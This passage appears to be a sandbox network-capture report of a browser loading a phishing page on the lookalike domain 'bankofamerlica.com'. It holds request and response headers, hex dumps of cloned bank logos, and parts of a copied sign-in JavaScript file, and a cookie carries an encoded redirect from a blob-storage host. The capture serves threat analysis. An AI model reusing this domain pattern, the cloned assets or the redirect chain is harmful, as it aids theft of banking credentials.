                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:41:58 UTC251INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:41:58 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:06:04 GMT
                                                                                              ETag: "4adf-611803e998b00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 19167
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:41:58 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2a 00 00 01 a0 08 03 00 00 00 2a cf da a3 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 04 66 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20
                                                                                              Data Ascii: PNGIHDR**tEXtSoftwareAdobe ImageReadyqe<fiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20
                                                                                              2025-01-15 18:41:58 UTC2783INData Raw: 3b 0f 13 7c ed 40 e5 c8 06 db 66 63 90 57 55 f5 46 d7 aa 4a c6 3e 6e c5 b2 47 7b bc 98 53 7a 58 cc 48 4a 2f f7 c4 7d 1c 57 31 bb 06 eb 64 cc 17 7b d8 7f a4 bc dc 43 81 a2 64 4e 8a 1f 4a 05 bd 24 ff 56 4a f2 51 75 85 aa ec d5 07 1c 51 15 33 bb 2b f3 e2 73 41 9a b3 dc 43 78 c0 e1 84 d9 70 4b 35 78 9c de 09 d7 86 1f 6b c7 89 7b 34 c0 eb de 33 40 99 96 a7 13 dd ec 4e ca fa f4 22 6b 3d a4 d3 e6 bc 14 82 f6 9d 76 dd 9d 4b 7e 6a af 93 a8 24 2b 35 28 ca 5d 05 42 a1 58 96 b3 50 46 70 20 96 68 e1 91 0a 0a 37 b4 ef 0a 7c 83 8a 92 0c 38 29 8f 95 1a 9e 0a a5 04 65 52 7a 51 49 e5 e7 73 a6 d6 21 e6 04 49 95 5a 51 87 51 dd ea 3a 5f 25 b1 77 b0 58 e6 ce c0 9b 61 70 61 24 3d 92 61 0b 14 ed d5 c1 65 fa 32 29 5f 8e a3 f3 77 f3 3f 68 f7 45 c8 43 d5 a9 e1 b2 bb ad 83 dd 26 39
                                                                                              Data Ascii: ;|@fcWUFJ>nG{SzXHJ/}W1d{CdNJ$VJQuQ3+sACxpK5xk{43@N"k=vK~j$+5(]BXPFp h7|8)eRzQIs!IZQQ:_%wXapa$=ae2)_w?hEC&9


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              15192.168.2.1659084188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:59 UTC564OUTGET /assets/mobile_llama.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:41:59 UTC251INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:41:59 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:06:04 GMT
                                                                                              ETag: "4adf-611803e998b00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 19167
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:41:59 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2a 00 00 01 a0 08 03 00 00 00 2a cf da a3 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 04 66 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20
                                                                                              Data Ascii: PNGIHDR**tEXtSoftwareAdobe ImageReadyqe<fiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20
                                                                                              2025-01-15 18:41:59 UTC2783INData Raw: 3b 0f 13 7c ed 40 e5 c8 06 db 66 63 90 57 55 f5 46 d7 aa 4a c6 3e 6e c5 b2 47 7b bc 98 53 7a 58 cc 48 4a 2f f7 c4 7d 1c 57 31 bb 06 eb 64 cc 17 7b d8 7f a4 bc dc 43 81 a2 64 4e 8a 1f 4a 05 bd 24 ff 56 4a f2 51 75 85 aa ec d5 07 1c 51 15 33 bb 2b f3 e2 73 41 9a b3 dc 43 78 c0 e1 84 d9 70 4b 35 78 9c de 09 d7 86 1f 6b c7 89 7b 34 c0 eb de 33 40 99 96 a7 13 dd ec 4e ca fa f4 22 6b 3d a4 d3 e6 bc 14 82 f6 9d 76 dd 9d 4b 7e 6a af 93 a8 24 2b 35 28 ca 5d 05 42 a1 58 96 b3 50 46 70 20 96 68 e1 91 0a 0a 37 b4 ef 0a 7c 83 8a 92 0c 38 29 8f 95 1a 9e 0a a5 04 65 52 7a 51 49 e5 e7 73 a6 d6 21 e6 04 49 95 5a 51 87 51 dd ea 3a 5f 25 b1 77 b0 58 e6 ce c0 9b 61 70 61 24 3d 92 61 0b 14 ed d5 c1 65 fa 32 29 5f 8e a3 f3 77 f3 3f 68 f7 45 c8 43 d5 a9 e1 b2 bb ad 83 dd 26 39
                                                                                              Data Ascii: ;|@fcWUFJ>nG{SzXHJ/}W1d{CdNJ$VJQuQ3+sACxpK5xk{43@N"k=vK~j$+5(]BXPFp h7|8)eRzQIs!IZQQ:_%wXapa$=ae2)_w?hEC&9


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              16192.168.2.1659083188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:59 UTC847OUTGET /assets/pill.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:41:59 UTC249INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:41:59 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:08:20 GMT
                                                                                              ETag: "7e6-6118046b4bd00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 2022
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:41:59 UTC2022INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2a 00 00 00 16 08 06 00 00 00 b6 7b 0e 8d 00 00 05 54 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 32 2d 63 30 30 30 20 37 39 2e 31 62 36 35 61 37 39 62 34 2c 20 32 30 32 32 2f 30 36 2f 31 33 2d 32 32 3a 30 31 3a 30 31 20 20 20 20 20 20 20 20 22 3e 0a 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68 74 74 70
                                                                                              Data Ascii: PNGIHDR*{TiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.1b65a79b4, 2022/06/13-22:01:01 "> <rdf:RDF xmlns:rdf="http


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              17192.168.2.1659085188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:59 UTC846OUTGET /assets/BOA.PNG HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:41:59 UTC252INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:41:59 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:29:04 GMT
                                                                                              ETag: "116c1-6118090daac00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 71361
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:41:59 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 51 00 00 00 54 08 06 00 00 00 63 a0 bd 84 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 ff a5 49 44 41 54 78 5e ec 7d 07 b8 16 45 d2 b5 01 30 6e 56 10 54 72 56 51 c9 19 c1 04 e6 9c b3 20 e9 92 33 12 25 09 92 41 44 89 22 51 30 93 14 41 44 24 4b ce f9 e6 9c 73 e2 fc e7 54 cf dc 7b 0d eb ae ec ea fe cf f3 bd 75 6f bf 33 d3 33 d3 5d 5d 5d 5d 5d 67 ba a7 e7 02 04 28 40 01 0a 50 80 02 14 a0 00 05 28 40 01 fa c3 e8 dc b9 73 16 7e ba 2f fa e9 f1 8f 48 e7 8a fc e1 5c 3e a3 bc e0 62 dc 56 f7 e7 eb bc 45 78 d7 e5 21 97 21 8f 41 e9 e4 67 67 23 37 25 05 59 67 43 91 b1 7d 2f d2 56 ac 46 d2 e4 d9 88 eb 3d
                                                                                              Data Ascii: PNGIHDRQTcsRGBgAMAapHYsodIDATx^}E0nVTrVQ 3%AD"Q0AD$KsT{uo33]]]]]g(@P(@s~/H\>bVEx!!Agg#7%YgC}/VF=
                                                                                              2025-01-15 18:41:59 UTC16384INData Raw: 3a 5a 12 94 60 c0 01 a8 76 94 bf eb 94 2f 2a d7 01 95 9b 0e 60 a7 3b 0d 9f ae de e5 ac 8c 1c 26 64 91 1f 39 4f 72 54 14 c7 28 6b e0 4e 9a 8e 67 35 7f 60 ea fb df 10 80 a8 33 65 bd b0 2e 55 5e 03 38 3c be a4 4a 17 d6 4d 2f 8c 99 f1 25 ef 73 49 e9 26 ab 06 ed 5b 9c 3a 4a af b3 b2 ac 5c fa ea 37 2c 8e 75 27 d3 17 97 98 82 37 a6 7c 8e da f7 8d 64 27 23 7d a1 83 41 9d 30 27 c8 0c 6f 07 5c 55 bb 37 9e e8 30 1b 73 97 6c 41 7c 62 2a ef d3 fd 0c 4a 4c 46 ca 3a 1a 19 f9 73 d8 c4 8e b8 c3 90 05 b8 e5 be 11 ee 7e 4d 15 20 b8 28 26 47 8a fa 27 67 45 4f c0 d4 69 bc c6 0e f6 cb 8d 47 58 6f c9 bc 5f fc 79 cc 93 fc e3 9f c6 ff 88 14 ad b2 f9 d7 f1 50 a2 ce b3 32 da 91 0b 2a af 76 bd 38 5d e9 1f 6a ea ca 37 5b 8e 61 d8 a4 cf 51 ef a1 91 b8 be 71 5f fc e9 86 6e ac df ae 28
                                                                                              Data Ascii: :Z`v/*`;&d9OrT(kNg5`3e.U^8<JM/%sI&[:J\7,u'7|d'#}A0'o\U70slA|b*JLF:s~M (&G'gEOiGXo_yP2*v8]j7[aQq_n(
                                                                                              2025-01-15 18:41:59 UTC16384INData Raw: 1f 46 ec d3 dd 91 38 72 ba 7d dc 36 fb d0 71 e4 25 a7 21 5f d3 77 99 bf 16 89 70 fe 81 b3 7d 26 75 2b bc db ba 5d ed 48 06 e2 95 76 22 3b 07 d9 31 31 c8 d8 b1 07 a9 f3 3f 44 72 df 31 48 78 a0 1d a2 6e bd df 3e d6 1b 52 da 07 4e 0c e2 4b 40 cf f8 f7 ca c0 a0 a9 87 b6 cc ba 17 ec a3 bf ba 8e 41 53 11 c3 ca f0 da b2 cd 11 d5 f8 09 24 3c df 1b c9 63 de 41 da c7 6b 91 f5 c3 41 e4 45 c6 d8 4a 85 92 a9 ca e0 2f 76 e1 56 74 3c 3f bd 09 80 a8 df 8d a4 3e 52 1e a7 4d 4e a1 1c cd fd 05 10 65 c6 be 92 7b 02 2e 43 ff 7c ef f7 b1 8b 46 31 5a 0b 03 08 bf 4b 59 d9 a0 b2 d9 29 a5 d3 78 24 a7 65 62 e1 8a 6d 78 aa c3 bb b6 f4 ac fb d8 ae 9e b4 69 2b 27 2d 08 25 aa 75 45 b3 c7 26 d0 18 7f 81 43 27 23 d5 fc f8 e7 1a b4 53 ec a2 0a e3 9d 33 45 2a c2 37 b7 66 0c 8c b4 cd c3 b7
                                                                                              Data Ascii: F8r}6q%!_wp}&u+]Hv";11?Dr1Hxn>RNK@AS$<cAkAEJ/vVt<?>RMNe{.C|F1ZKY)x$ebmxi+'-%uE&C'#S3E*7f
                                                                                              2025-01-15 18:41:59 UTC16384INData Raw: 4b 87 a3 4a 0b fc a9 7a 07 0c 78 eb 0b a4 a7 65 a1 b0 48 cb 97 7a 23 36 85 60 42 48 62 45 ca cf 0a 36 8a 26 7c 94 13 c1 3e 6c d8 9a 82 86 9d 27 e0 bc eb 5e a2 b2 95 63 e9 ca c7 d3 94 11 d1 84 8e 9e 56 e7 5b 81 6d 3b e5 44 05 cd 48 7f 2c 96 e4 94 6c 4c 9d b9 1c cf b5 1b cf fa 6a cf 77 64 70 f9 c2 1f 42 4d 83 fb 9f 6a 74 1c 6f 7a 05 95 ea 76 a1 43 a3 a9 3c 12 ee 54 e8 4a 23 50 ac fb 3b 51 11 c5 16 10 ab ff 5e ea ca 23 af 22 f9 d0 bf e8 73 82 d0 89 aa 11 99 ce a7 f4 5a 11 83 69 44 ac 9f 93 6a b5 c2 83 4d de c2 e8 89 df 23 3d 3d c7 f6 da 99 bf 74 2b fe d6 6c 34 8e 24 4d 32 fe a2 3d b7 3e ef 5e ce 6c f9 0b 1b a3 fa 4d 3d d1 b8 d3 44 ac 52 cf 5e 69 61 d0 0f 26 61 13 4b 87 8e 12 3b aa 0b 95 99 07 45 1e b1 c7 f4 4f 39 52 3b f0 a7 4c 54 c9 68 61 fe c2 67 c5 67 36
                                                                                              Data Ascii: KJzxeHz#6`BHbE6&|>l'^cV[m;DH,lLjwdpBMjtozvC<TJ#P;Q^#"sZiDjM#==t+l4$M2=>^lM=DR^ia&aK;EO9R;LThagg6
                                                                                              2025-01-15 18:41:59 UTC5825INData Raw: 62 7e b9 05 00 00 16 a5 49 44 41 54 17 d7 ef 8d e6 1d 27 e1 e3 cf d7 20 bf c4 07 7e 25 2a 82 0c 19 dd 6e ec 28 dc d3 57 7e 36 6e 4d 41 d3 ee da d3 a5 a7 2d e4 a1 6f 0d 8e 65 7e 8e 66 7e 8e 56 f9 32 ee eb 1f 1e 84 e9 73 d7 60 47 72 06 c9 0b 0b 83 e5 62 10 96 94 d3 6c 86 1f 93 54 dc 79 34 b0 7e da b4 13 43 c7 7f 8b da 77 bf 66 fb 5c 1c 4b c5 ac f2 52 3a 9e 06 eb 93 e7 32 3e 4f bd aa 33 fa 8f fa d2 de 2d 5b f0 4a 47 a0 54 2c f2 32 61 2e f6 f4 bc 43 7a 66 2e 1d 88 39 a8 fb c0 1b 56 f7 47 53 71 1d 25 9e 60 5e 8e ab 4a 24 9f a8 97 fd b1 56 a3 f1 ee d4 05 b6 c8 87 ea c0 e2 52 dc 56 fe 42 a5 55 6a 2b 88 6d 4f c9 c4 80 d1 5f d1 41 7a 1d 67 5c d3 89 e5 df dc 78 f0 38 3a 26 c7 55 0d f3 d3 c6 a6 56 5e 70 cb cb 68 db f3 23 7c f6 d5 1a ec a6 f1 a1 da 00 b4 4b 3c cb 5e
                                                                                              Data Ascii: b~IDAT' ~%*n(W~6nMA-oe~f~V2s`GrblTy4~Cwf\KR:2>O3-[JGT,2a.Czf.9VGSq%`^J$VRVBUj+mO_Azg\x8:&UV^ph#|K<^


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              18192.168.2.1659086188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:59 UTC584OUTGET /assets/online-id-vipaa-module-enter-skin.js HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:41:59 UTC287INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:41:59 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Wed, 21 Feb 2024 13:17:16 GMT
                                                                                              ETag: "ce78-611e42548af00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 52856
                                                                                              Vary: Accept-Encoding
                                                                                              Connection: close
                                                                                              Content-Type: application/javascript
                                                                                              2025-01-15 18:41:59 UTC16384INData Raw: 24 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 0a 20 20 20 20 20 20 0a 20 20 20 20 69 66 20 28 24 28 27 2e 6f 6e 6c 69 6e 65 2d 69 64 2d 76 69 70 61 61 2d 6d 6f 64 75 6c 65 20 2e 65 6e 74 65 72 2d 73 6b 69 6e 27 29 2e 6c 65 6e 67 74 68 20 3e 20 30 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 2f 2f 43 68 65 63 6b 20 70 6f 6c 69 63 79 20 63 61 6c 6c 0a 20 20 20 20 20 20 20 20 2f 2f 6f 6e 6c 69 6e 65 2d 69 64 2d 73 65 6c 65 63 74 20 66 6f 72 20 73 61 76 65 64 20 6f 69 64 73 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 69 64 73 65 6c 65 63 74 20 3d 20 24 28 27 73 65 6c 65 63 74 23 6f 6e 6c 69 6e 65 2d 69 64 2d 73 65 6c 65 63 74 27 29 3b 0a 20 20 20 20 20 20 20 20 2f 2f 6f 6e 6c 69 6e 65 2d 69 64 2d 69 6e 70 75 74 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 69 64 69
                                                                                              Data Ascii: $(function () { if ($('.online-id-vipaa-module .enter-skin').length > 0) { //Check policy call //online-id-select for saved oids var oidselect = $('select#online-id-select'); //online-id-input var oidi
                                                                                              2025-01-15 18:41:59 UTC16384INData Raw: 73 73 28 27 64 69 73 70 6c 61 79 4e 6f 6e 65 27 29 3b 0a 09 09 09 09 09 24 28 27 23 73 69 67 6e 69 6e 2d 6d 6f 62 69 6c 65 2d 61 70 70 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 6d 6f 62 69 6c 65 2d 61 70 70 27 29 3b 20 0a 09 09 09 09 09 24 28 27 23 64 69 67 69 74 61 6c 2d 69 64 2d 67 65 6e 65 72 61 6c 2d 65 72 72 6f 72 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 27 29 3b 0a 09 09 09 09 09 24 28 27 23 64 69 67 69 74 61 6c 2d 69 64 2d 73 75 63 63 65 73 73 2d 6d 65 73 73 61 67 65 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 27 29 3b 0a 09 09 09 09 09 24 28 27 23 65 6e 74 65 72 49 44 2d 69 6e 70 75 74 27 29 2e 70 61 72 65 6e 74 28 27 64 69 76 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 27 29 3b 0a 09 09 09 09 09 24
                                                                                              Data Ascii: ss('displayNone');$('#signin-mobile-app').removeClass('mobile-app'); $('#digital-id-general-error').addClass('hidden');$('#digital-id-success-message').addClass('hidden');$('#enterID-input').parent('div').addClass('hidden');$
                                                                                              2025-01-15 18:41:59 UTC16384INData Raw: 09 7d 0a 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 7d 2c 32 30 30 30 29 3b 0a 09 09 09 7d 0a 09 09 7d 29 3b 0a 09 7d 29 3b 0a 7d 0a 0a 77 69 6e 64 6f 77 2e 62 6f 61 2e 6f 69 64 56 69 70 61 61 4d 6f 64 75 6c 65 20 3d 20 77 69 6e 64 6f 77 2e 62 6f 61 2e 6f 69 64 56 69 70 61 61 4d 6f 64 75 6c 65 20 7c 7c 20 7b 7d 3b 0a 0a 77 69 6e 64 6f 77 2e 62 6f 61 2e 6f 69 64 56 69 70 61 61 4d 6f 64 75 6c 65 2e 66 6f 72 6d 53 75 62 6d 69 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 76 61 72 20 74 68 61 74 20 3d 20 24 28 27 61 5b 6e 61 6d 65 3d 22 65 6e 74 65 72 2d 6f 6e 6c 69 6e 65 2d 69 64 2d 73 75 62 6d 69 74 22 5d 27 29 3b 0a 09 69 66 20 28 20 74 68 61 74 2e 70 61 72 65 6e 74 73 28 27 2e 73 69 6d 70 6c 65 2d 66 6f 72 6d 27 29 2e 61 74 74 72 28 27 69 64
                                                                                              Data Ascii: }}},2000);}});});}window.boa.oidVipaaModule = window.boa.oidVipaaModule || {};window.boa.oidVipaaModule.formSubmit = function(){var that = $('a[name="enter-online-id-submit"]');if ( that.parents('.simple-form').attr('id
                                                                                              2025-01-15 18:41:59 UTC3704INData Raw: 09 09 09 09 09 72 65 71 75 69 72 65 64 3a 20 22 50 6f 72 20 66 61 76 6f 72 2c 20 69 6e 64 69 71 75 65 20 74 6f 64 61 20 6c 61 20 69 6e 66 6f 72 6d 61 63 69 26 23 32 34 33 3b 6e 20 73 6f 6c 69 63 69 74 61 64 61 20 70 61 72 61 20 63 6f 6e 74 69 6e 75 61 72 2e 22 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d 2c 0a 09 09 09 09 09 72 75 6c 65 73 3a 20 7b 0a 09 09 09 09 09 09 22 65 6e 74 65 72 49 44 2d 6b 6e 6f 77 6e 2d 69 6e 70 75 74 22 3a 20 7b 0a 09 09 09 09 09 09 09 72 65 71 75 69 72 65 64 20 3a 20 7b 0a 09 09 09 09 09 09 09 64 65 70 65 6e 64 73 3a 20 66 75 6e 63 74 69 6f 6e 28 65 6c 65 6d 65 6e 74 29 20 7b 0a 09 09 09 09 09 09 09 09 09 09 09 09 72 65 74 75 72 6e 20 24 28 22 23 65 6e 74 65 72 2d 69 64 2d 64 69 76 22 29 2e 69 73 28 22 3a 76 69 73 69 62 6c
                                                                                              Data Ascii: required: "Por favor, indique toda la informaci&#243;n solicitada para continuar."}},rules: {"enterID-known-input": {required : {depends: function(element) {return $("#enter-id-div").is(":visibl


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              19192.168.2.1659087188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:59 UTC564OUTGET /assets/vipaa-v4-jawr.js HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
